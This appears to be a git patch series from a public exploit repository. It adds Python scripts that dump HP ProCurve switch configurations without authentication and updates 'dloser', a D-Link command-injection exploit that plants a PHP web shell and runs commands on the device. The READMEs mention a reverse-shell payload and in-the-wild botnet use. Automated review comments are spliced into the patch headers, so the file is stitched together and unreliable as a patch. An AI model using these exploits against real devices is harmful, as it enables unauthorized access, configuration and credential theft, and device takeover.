From 68d71a249c7af5cd666de39022f8f09199a32cdd Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Mon, 11 Feb 2019 10:11:50 +0100
Subject: [PATCH 1/7] Create README.md
---
 procurvy/README.md | 4 ++++
 1 file changed, 4 insertions(+)
 create mode 100644 procurvy/README.md
diff --git a/procurvy/README.md b/procurvy/README.md
new file mode 100644
index 0000000..af44690
--- /dev/null
+++ b/procurvy/README.md
@@ -0,0 +1,4 @@
+## HP Procurve Switch Config Disclosure
+
+Found these when cleaning up some old files over the weekend, there are two scripts. Both of them dump configs from certain HP Procurve switches. I don't have the notes associated with them any more, but I know they were disclosed to HP at some point.
+
From 466cbe2773f65f1da3265cbe132618147e2d0f79 Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Mon, 11 Feb 2019 10:12:37 +0100
Subject: [PATCH 2/7] Create leak_config_hr.py
---
 procurvy/leak_config_hr.py | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 procurvy/leak_config_hr.py
diff --git a/procurvy/leak_config_hr.py b/procurvy/leak_config_hr.py
new file mode 100644
index 0000000..a9e75b4
--- /dev/null
+++ b/procurvy/leak_config_hr.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+from __future__ import print_function
+import sys
+import requests
+import urlparse
+
+def main(args):
+ for host in args:
+ if host[:4] != 'http':
+ host = 'http://' + host
+ if host[-1] != '/':
+ host = host + '/'
+ print(host)
+ sess = requests.Session()
+ resp = sess.get(host)
+ if resp.status_code == 200 and 'nhome.html' in resp.text:
+ resp = sess.get(host + 'html/trbl_confReportTxt.html')
+ if 'Running configuration' in resp.text:
+ domain = host.split('/')[2]
+ print("SUCCESS for", domain)
+
+ with open(domain + ".config.txt", "w") as handle:
+ handle.write(resp.text)
+
+if __name__ == "__main__":
+ main(sys.argv[1:])
From bb7f6b7e180cfc44fd84d8d2038a5e4639b51372 Mon Sep 17 00:00:00 2001
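Review bot: `import urlparse` in the leak_config_hr.py hunk is never referenced anywhere in the added file, and it is the Python 2 module name, so the `from __future__ import print_function` line does not make this script Python 3 capable as it would fail at import time there; the unused line should simply be dropped, `import urlparse` removed. The output filename is built from `host.split('/')[2]`, which for a `host:port` target includes the `:` character, so a comment noting that the file name is derived from the raw command-line argument would help the next reader, e.g. `# file name comes straight from the argument (may contain ':' for host:port)`.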
From: David Davidson
Date: Mon, 11 Feb 2019 10:13:06 +0100
Subject: [PATCH 3/7] Create leak_config_dm.py
---
 procurvy/leak_config_dm.py | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 procurvy/leak_config_dm.py
diff --git a/procurvy/leak_config_dm.py b/procurvy/leak_config_dm.py
new file mode 100644
index 0000000..4e29dee
--- /dev/null
+++ b/procurvy/leak_config_dm.py
@@ -0,0 +1,33 @@
+#!/usr/bin/python2
+# coding: utf-8
+import requests
+import sys
+import re
+
+def log_config(ip, config):
+ logfile = "out/%s-config.ppc" %(ip)
+ f = open(logfile, "wb")
+ f.write(config)
+ f.close()
+
+def dump_config(target):
+ ip = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target).group()
+ print "{+} Dumping config from %s" %(ip)
+ url = "%s/html/json.html?method:downloadConfigFileToPC&name=config" %(target)
+ try:
+ r = requests.get(url, verify=False)
+ except:
+ sys.exit("{-} Dump failed...")
+ if "Config" in r.text:
+ log_config(ip=ip, config=r.text)
+ print "{+} Dumped config to out/%s-config.ppc" %(ip)
+ else:
+ sys.exit("{-} Dump failed...")
+
+def main(args):
+ if len(args) != 2:
+ sys.exit("use: %s http://1.1.1.1:80" %(args[0]))
+ dump_config(target=args[1])
+
+if __name__ == "__main__":
+ main(args=sys.argv)
From 9f74cb045e8a142816455c7af42ac0818161c32c Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Mon, 11 Feb 2019 10:13:59 +0100
Subject: [PATCH 4/7] Update README.md
---
 procurvy/README.md | 1 +
 1 file changed, 1 insertion(+)
diff --git a/procurvy/README.md b/procurvy/README.md
index af44690..6830937 100644
--- a/procurvy/README.md
+++ b/procurvy/README.md
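Review bot: The bare `except:` around `requests.get` in `dump_config` also swallows `KeyboardInterrupt` and `SystemExit`, so an interrupted request is reported as "Dump failed..." rather than stopping the script; the narrower `except requests.RequestException:` expresses what the handler is actually for. `log_config` opens the output file without a `with` block, so the handle is not closed if `f.write` raises, and since `r.text` is unicode under Python 2 while the file is opened with `"wb"`, the write relies on an implicit ASCII encode that fails on any non-ASCII byte in the response. Rewriting it as `with open(logfile, "wb") as f:` followed by `f.write(config.encode("utf-8"))` closes both gaps in two lines.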
@@ -2,3 +2,4 @@
 Found these when cleaning up some old files over the weekend, there are two scripts. Both of them dump configs from certain HP Procurve switches. I don't have the notes associated with them any more, but I know they were disclosed to HP at some point.
+Both of them use seemingly different ways to leak the config without authentication, again, I don't have the notes for these.
From 705e5800617d3cd6e19cc55cb8afe72bcd57f88d Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Thu, 7 May 2020 21:14:05 +0200
Subject: [PATCH 5/7] Fix requests usage for users, remove proxy.
---
 dloser/dloser.py | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)
diff --git a/dloser/dloser.py b/dloser/dloser.py
index 0d2778c..f3de1ca 100644
--- a/dloser/dloser.py
+++ b/dloser/dloser.py
@@ -1,6 +1,6 @@
 #!/usr/bin/python2
 # coding: utf-8
-import requesocks
+import requests
 import sys
 red = "\x1b[1;31m"
@@ -12,8 +12,6 @@ white = "\x1b[1;37m"
 clear = "\x1b[0m"
-proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
-
 def banner():
 print """
 %s██████╗ ██╗ ██████╗ ███████╗███████╗██████╗ %s
@@ -29,7 +27,7 @@ def banner_grab(target):
 sys.stdout.write("%s{*} Checking target fingerprint...%s" %(blue, clear))
 sys.stdout.flush()
 try:
- r = requesocks.head(url=target, proxies=proxies, verify=False)
+ r = requests.head(url=target, verify=False)
 except Exception, e:
 sys.stdout.write(" %s[failed]%s\n" %(red, clear))
 sys.exit(0)
@@ -44,7 +42,7 @@ def check_cgi(target):
 sys.stdout.write("%s{*} Checking for /cgi-bin/system_mgr.cgi...%s" %(blue, clear))
 sys.stdout.flush()
 try:
- r = requesocks.head(url=url, proxies=proxies, verify=False)
+ r = requests.head(url=url, verify=False)
 except Exception, e:
 sys.stdout.write(" %s[failed]\n%s" %(red, clear))
 sys.exit(0)
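Review bot: In the banner_grab hunk (-29,7) the `except Exception, e:` clause binds `e` but the handler only writes "[failed]" and calls `sys.exit(0)`, so the name is dead; the same pattern recurs in the check_cgi hunk (-44,7) here and the check_0day hunk (-59,7) on the following line, while the execute_command and execute_php hunks do use `e`. Since the commit already touches the line above each of these clauses, the plainer `except Exception:` would fit the same change. The comma form is Python 2-only syntax, which is consistent with the `#!/usr/bin/python2` shebang kept by the first hunk, so this is a style point rather than a defect. Each of these function bodies starts and ends outside its hunk.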
@@ -59,7 +57,7 @@ def check_0day(target):
 sys.stdout.flush()
 url = target + "/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=id;"
 try:
- r = requesocks.get(url=url, proxies=proxies, verify=False)
+ r = requests.get(url=url, verify=False)
 except Exception, e:
 sys.stdout.write(" %s[failed]\n%s" %(red, clear))
 sys.exit(0)
@@ -77,7 +75,7 @@ def execute_command(target, command):
 command = command.replace(' ', '%20')
 url = target + "/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=%s" %(command)
 try:
- r = requesocks.get(url=url, proxies=proxies, verify=False)
+ r = requests.get(url=url, verify=False)
 except Exception, e:
 sys.exit("%s{-} Exception hit! Printing stack trace...\n%s%s" %(red, str(e), clear))
 output = r.text.replace("Content-type: text/html", "")
@@ -106,7 +104,7 @@ def upload_shell(target):
 upload = execute_command(target, command="echo -ne '%s'>/var/www/ajaxplorer/plugins/access.remote_fs/pwn.php" %(payload))
 check_shell(target)
-def encode_php(phpcode): #base64 that shit niqqa!
+def encode_php(phpcode):
 phpcode = phpcode.encode('base64')
 phpcode = phpcode.replace("\n", "")
 phpcode = phpcode.strip()
@@ -117,7 +115,7 @@ def execute_php(target, php):
 postdata = {'woot': php}
 url = target + '/ajaxplorer/plugins/access.remote_fs/pwn.php'
 try:
- execute = requesocks.post(url=url, data=postdata, proxies=proxies, verify=False, allow_redirects=False)
+ execute = requests.post(url=url, data=postdata, verify=False, allow_redirects=False)
 except Exception, e:
 sys.exit("%s{-} Something went horribly wrong. Bailing!\n%s%s" %(red, str(e), clear))
 output = execute.text.rstrip()
From 64740593d8255eca49aeee8474852bcf9e18a3e2 Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Thu, 7 May 2020 21:19:43 +0200
Subject: [PATCH 6/7] Update README.md
---
 dloser/README.md | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/dloser/README.md b/dloser/README.md
index 5791012..d48d795 100644
--- a/dloser/README.md
+++ b/dloser/README.md
@@ -4,3 +4,8 @@ Old exploit I found on one of my old boxes that I put together for a demo. Bug w
 This exploit has been shared around a fair bit in the past, and probably has seen some actual in the wild use, so figured it was time to kill it dead.
 "callback.php" is the PentestMonkey reverse shell, stripped of some bits and such so that it works reliably. I can't find it currently but will upload it later. You are welcome to supply your own backconnect payload and alter the exploit appropriately.
+
+Notes:
+Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency).
+Bug was found... Sometime around 2013 or so? Maybe a bit earlier? I can't be sure. Turns out theres a bug collission and someone else had also found it in 2012! - http://roberto.greyhats.it/advisories/20120208-dlink-rce.txt
+Bug seems to have been used ITW to create a botnet by some weaboo - https://www.zdnet.com/article/for-8-years-a-hacker-operated-a-massive-iot-botnet-just-to-download-anime-videos/
From 44bf14da73220467410c2d952c33638281c47954 Mon Sep 17 00:00:00 2001
From: David Davidson
Date: Thu, 7 May 2020 21:20:14 +0200
Subject: [PATCH 7/7] Update README.md
---
 dloser/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/dloser/README.md b/dloser/README.md
index d48d795..d0277d2 100644
--- a/dloser/README.md
+++ b/dloser/README.md
@@ -6,6 +6,6 @@ This exploit has been shared around a fair bit in the past, and probably has see
 "callback.php" is the PentestMonkey reverse shell, stripped of some bits and such so that it works reliably. I can't find it currently but will upload it later. You are welcome to supply your own backconnect payload and alter the exploit appropriately.
 Notes:
-Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency).
+Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency). Had originally spoken publicly about this bug at SteelCon in 2015, but forgot to release the code at the time.
 Bug was found... Sometime around 2013 or so? Maybe a bit earlier? I can't be sure. Turns out theres a bug collission and someone else had also found it in 2012! - http://roberto.greyhats.it/advisories/20120208-dlink-rce.txt
 Bug seems to have been used ITW to create a botnet by some weaboo - https://www.zdnet.com/article/for-8-years-a-hacker-operated-a-massive-iot-botnet-just-to-download-anime-videos/